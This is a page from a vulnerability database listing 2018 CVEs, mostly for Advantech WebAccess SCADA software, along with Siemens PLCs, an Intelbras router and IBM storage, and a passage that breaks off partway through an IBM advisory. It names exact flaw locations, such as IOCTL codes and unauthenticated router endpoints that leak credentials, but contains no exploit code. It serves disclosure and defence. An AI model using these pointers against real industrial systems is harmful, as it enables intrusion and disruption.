VARIoT IoT vulnerabilities database

VAR-201805-1143 | CVE-2018-7499 | Advantech WebAccess Node bwsound Stack-based Buffer Overflow Remote Code Execution Vulnerability |
CVSS V2: 9.3 CVSS V3: 9.8 Severity: HIGH |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several stack-based buffer overflow vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. Multiple Advantech WebAccess products contain a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability. The specific flaw exists within bwsound.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A stack buffer overflow vulnerability exists in several Advantech products
VAR-201805-1144 | CVE-2018-7501 | SQL injection vulnerability in multiple Advantech WebAccess products |
CVSS V2: 4.0 CVSS V3: 7.5 Severity: MEDIUM |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several SQL injection vulnerabilities have been identified, which may allow an attacker to disclose sensitive information from the host. Multiple Advantech WebAccess products contain an SQL injection vulnerability. Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess Node. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the PointList function in BWMobileService.dll. When parsing the ProjectName parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose sensitive information under the context of the database. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-1142 | CVE-2018-7497 | Advantech WebAccess Node webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability |
CVSS V2: 9.3 CVSS V3: 9.8 Severity: HIGH |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several untrusted pointer dereference vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. Multiple Advantech WebAccess products contain a NULL pointer dereference vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x277e IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-1145 | CVE-2018-7503 | Path traversal vulnerability in multiple Advantech WebAccess products |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path traversal vulnerability has been identified, which may allow an attacker to disclose sensitive information on the target. Multiple Advantech WebAccess products contain a path traversal vulnerability. Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DownloadAction servlet. When parsing the filename and taskname parameters, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-1146 | CVE-2018-7505 | Unrestricted upload vulnerability in multiple Advantech WebAccess products |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a TFTP application has unrestricted file uploads to the web application without authorization, which may allow an attacker to execute arbitrary code. Multiple Advantech WebAccess products contain a vulnerability related to unrestricted upload of dangerous file types. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute code on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability. The specific flaw exists within the configuration of the TFTP service. The issue results from the lack of proper validation of user-supplied data, which can allow for the upload of arbitrary files. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A privilege elevation vulnerability exists in several Advantech products that stems from a TFTP application that allows unauthorized uploading of arbitrary files to a web application. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. An escalation of privilege vulnerability exists in several Advantech products. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-1126 | CVE-2018-8841 | Vulnerabilities related to authorization, permissions, and access control in multiple Advantech WebAccess products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an improper privilege management vulnerability may allow an authenticated user to modify files when read access should only be given to the user. Multiple Advantech WebAccess products contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows local attackers to escalate privilege on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. An attacker can leverage this vulnerability to execute arbitrary code under the context of Administrator, the IUSR account, or SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A security vulnerability exists in several Advantech products that stems from a program's failure to properly manage permissions. An attacker could use this vulnerability to modify a file.
Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess etc
VAR-201805-1128 | CVE-2018-8845 | Buffer error vulnerability in multiple Advantech WebAccess products |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a heap-based buffer overflow vulnerability has been identified, which may allow an attacker to execute arbitrary code. Multiple Advantech WebAccess products contain a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. When parsing the NamedObject structure, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A heap buffer overflow vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following products and versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-0249 | CVE-2018-10589 | Advantech WebAccess Path traversal vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path traversal vulnerability has been identified, which may allow an attacker to execute arbitrary code. Advantech WebAccess contains a path traversal vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A path traversal vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-0251 | CVE-2018-10591 | Advantech WebAccess Source Validation Error Vulnerability |
CVSS V2: 2.6 CVSS V3: 6.1 Severity: MEDIUM |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an origin validation error vulnerability has been identified, which may allow an attacker to create a malicious web site, steal session cookies, and access data of authenticated users. Advantech WebAccess contains a session fixation vulnerability. Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-0250 | CVE-2018-10590 | File and directory information disclosure vulnerability in Advantech WebAccess |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an information exposure vulnerability through directory listing has been identified, which may allow an attacker to find important files that are not normally visible. Advantech WebAccess contains a file and directory information disclosure vulnerability. Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. An attacker could exploit this vulnerability to obtain important files that are not visible. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-1131 | CVE-2018-4850 | Data processing vulnerability in SIEMENS SIMATIC S7-400 CPU and SIMATIC S7-400H CPU |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability has been identified in SIMATIC S7-400 (incl. F) CPU hardware version 4.0 and below (All versions), SIMATIC S7-400 (incl. F) CPU hardware version 5.0 (All firmware versions < V5.2), SIMATIC S7-400H CPU hardware version 4.5 and below (All versions). The affected CPUs improperly validate S7 communication packets, which could cause a Denial-of-Service condition of the CPU. The CPU will remain in DEFECT mode until manual restart. SIEMENS SIMATIC S7-400 CPU and SIMATIC S7-400H CPU contain a data processing vulnerability. Service operation may be interrupted (DoS). The products in the Siemens SIMATIC S7-400 CPU family have been designed for process control in industrial environments. There is a denial of service vulnerability in the Siemens SIMATIC S7-400.
Remote attackers may exploit this issue to cause denial-of-service conditions, denying service to legitimate users. F) and SIMATIC S7-400H CPU. The vulnerability is caused by the program not correctly verifying S7 communication packets. The following products and versions are affected: Siemens SIMATIC S7-400 4.0 and earlier, SIMATIC S7-400 (incl
VAR-201805-0687 | CVE-2018-10825 | Access control vulnerability in Mimo Baby 2 devices |
CVSS V2: 2.9 CVSS V3: 5.3 Severity: MEDIUM |
Mimo Baby 2 devices do not use authentication or encryption for the Bluetooth Low Energy (BLE) communication from a Turtle to a Lilypad, which allows attackers to inject fake information about the position and temperature of a baby via a replay or spoofing attack. The Mimo Baby 2 device contains an access control vulnerability. Information may be altered. Rest Devices Mimo Baby is a baby sleep tracker device from Rest Devices, UK. A security vulnerability exists in Rest Devices Mimo Baby 2 because the program fails to properly authenticate or encrypt Bluetooth Low Energy (BLE) traffic between Turtle and Lilypad
VAR-201805-1202 | No CVE | MXProgrammer software has a denial of service vulnerability |
CVSS V2: 5.6 CVSS V3: - Severity: MEDIUM |
MXProgrammer is Windows desktop software from Weihai Meike Electric Technology Co., Ltd. It is used to communicate with the company's MX series PLC products and to perform functions such as program writing and downloading.
MXProgrammer software has a denial of service vulnerability. mfc120.dll is a dynamic link library under the MXProgrammer software installation path. When opening a malformed project file, MXProgrammer.exe software crashes due to an illegal access error inside mfc120.dll
VAR-201805-0554 | CVE-2018-11094 | Vulnerabilities related to the use of hard-coded credentials in Intelbras NCLOUD 300 |
Related entries in the VARIoT exploits database: VAR-E-201805-0057 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on Intelbras NCLOUD 300 1.0 devices. /cgi-bin/ExportSettings.sh, /goform/updateWPS, /goform/RebootSystem, and /goform/vpnBasicSettings do not require authentication. For example, when an HTTP POST request is made to /cgi-bin/ExportSettings.sh, the username, password, and other details are retrieved. Intelbras NCLOUD 300 contains a vulnerability in the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). Intelbras NCLOUD 300 is a wireless router device from Intelbras, Brazil. A security vulnerability exists in Intelbras NCLOUD 300 1.0, which is caused by a program that fails to require authentication. By sending a request to /cgi-bin/ExportSettings.sh, /goform/updateWPS, /goform/RebootSystem, and /goform/vpnBasicSettings, an attacker can use the vulnerability to obtain sensitive information (such as username, password, and other details), cause a denial of service (restart), or open or close the VPN
VAR-201805-1141 | CVE-2018-7495 | Path traversal vulnerability in multiple Advantech WebAccess products |
CVSS V2: 6.4 CVSS V3: 7.5 Severity: HIGH |
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an external control of file name or path vulnerability has been identified, which may allow an attacker to delete files. Multiple Advantech WebAccess products contain a path traversal vulnerability. Information may be tampered with. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to delete files under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. An information-disclosure vulnerability
3. A file-upload vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple stack-based buffer-overflow vulnerabilities
6. A heap-based buffer-overflow vulnerability
7. Multiple arbitrary code-execution vulnerabilities
8. A denial-of-service vulnerability
9. A security-bypass vulnerability
10. A privilege-escalation vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, modify data, exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application, gain unauthorized access, and obtain sensitive information. Failed attacks will cause denial-of-service conditions. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
VAR-201805-0966 | CVE-2018-3611 | Intel Graphics Driver Input validation vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
Bounds check vulnerability in User Mode Driver in Intel Graphics Driver 15.40.x.4 and 21.20.x.x allows unprivileged user to cause a denial of service via local access. Intel Graphics Driver contains an input validation vulnerability. Service operation may be interrupted (DoS). Intel Graphics Driver is an integrated graphics driver developed by Intel Corporation. User Mode Driver is one of the user mode drivers
VAR-201805-0917 | CVE-2018-3661 | Intel system Configuration utilities selview.exe and syscfg.exe Buffer error vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Buffer overflow in Intel system Configuration utilities selview.exe and syscfg.exe before version 14 build 11 allows a local user to crash these services potentially resulting in a denial of service. Intel system Configuration utilities selview.exe and syscfg.exe contain a buffer error vulnerability. Service operation may be interrupted (DoS).
An attacker can exploit this issue to obtain sensitive information or cause a denial-of-service condition. Due to the nature of this issue, code execution may be possible but this has not been confirmed. Intel system Configuration utilities selview.exe and syscfg.exe are system configuration utilities of Intel Corporation.
Document Title:
===============
Intel System CU - Buffer Overflow (Denial of Service) Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2133
Security ID: INTEL-SA-00134
https://nvd.nist.gov/vuln/detail/CVE-2018-3661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3661
Acknowledgements:
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00134.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3661
CVE-ID:
=======
CVE-2018-3661
Release Date:
=============
2018-07-11
Vulnerability Laboratory ID (VL-ID):
====================================
2133
Common Vulnerability Scoring System:
====================================
5.5
Vulnerability Class:
====================
Buffer Overflow
Current Estimated Price:
========================
3.000€ - 4.000€
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local
buffer overflow vulnerability in the official Intel System CU 14.0 and 14.1.
Vulnerability Disclosure Timeline:
==================================
2018-05-15: Release Date (Intel)
2018-07-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Intel Systems
Product: Intel System - CU (Utilities) 14.0 build & 14.1 build - (Intel®
C620 Series Chipsets b19)
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Bug Bounty Program
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the
official Intel System CU 14.0 and 14.1 utilities.
The vulnerability can be exploited by local attackers to overwrite
active registers to compromise the process or
affected computer system.
Affected are versions of syscfg.exe before release 14.0 build 16 or for
systems based on Intel® C620 Series
Chipsets 14.1 build 19. Affected are versions of selview.exe before
release 14.0 build 21 or for systems based
on Intel® C620 Series Chipsets before 14.0 build 11.
Exploitation of the local buffer overflow vulnerability requires no user
interaction and system process privileges.
Successful exploitation of the buffer overflow vulnerability results in
a compromise of the local system process or
affected computer system.
Vulnerable File(s):
[+] syscfg.exe
[+] selview.exe
https://www.vulnerability-lab.com/resources/pictures/2133/Intel1.jpg
https://www.vulnerability-lab.com/resources/pictures/2133/Intel2.jpg
Security Risk:
==============
The security risk of the exploitable local buffer overflow vulnerability
in the utilities software is estimated as medium.
Credits & Authors:
==================
S.AbenMassaoud -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
VAR-201805-0351 | CVE-2018-1495 | Vulnerabilities related to authorization, permissions, and access control in IBM FlashSystem V840 and V900 products |
CVSS V2: 5.5 CVSS V3: 6.5 Severity: MEDIUM |
IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148. IBM FlashSystem V840 and V900 products contain vulnerabilities related to authorization, permissions, and access control. The vendor has confirmed this vulnerability and released it as IBM X-Force ID: 141148. Service operation may be interrupted (DoS). Both IBM FlashSystem V840 and V900 are all-flash enterprise-level storage solutions of IBM Corporation in the United States. The solution provides a full set of disaster recovery tools (including snapshot, clone and replication) to protect data and uses IBM Virtual Storage Center to provide virtualization configuration and performance management.
Vulnerabilities in IBMs Flashsystems and Storwize Products
-------------------------------------------------------------------------
Introduction
============
Vulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem
900 and IBM Storwize V7000. These were discovered during a black box
assessment and therefore the vulnerability list should not be considered
exhaustive; observations suggest that it is likely that further
vulnerabilities exist. It is strongly recommended that IBM Corporation
undertakes a full whitebox security assessment of this application.
The version under test was indicated as: 1.6.2.2 build 18
Affected Software And Versions
==============================
- IBM Flashsystem 900
- IBM Flashsystem 840
- IBM Storwize V7000
Affected versions are indicated directly within the reported issues.
CVE
===
The following CVEs were assigned to the issues described in this report:
CVE-2018-1438
CVE-2018-1433
CVE-2018-1434
CVE-2018-1462
CVE-2018-1463
CVE-2018-1464
CVE-2018-1495
CVE-2018-1467
CVE-2018-1465
CVE-2018-1466
CVE-2018-1461
Vulnerability Overview
======================
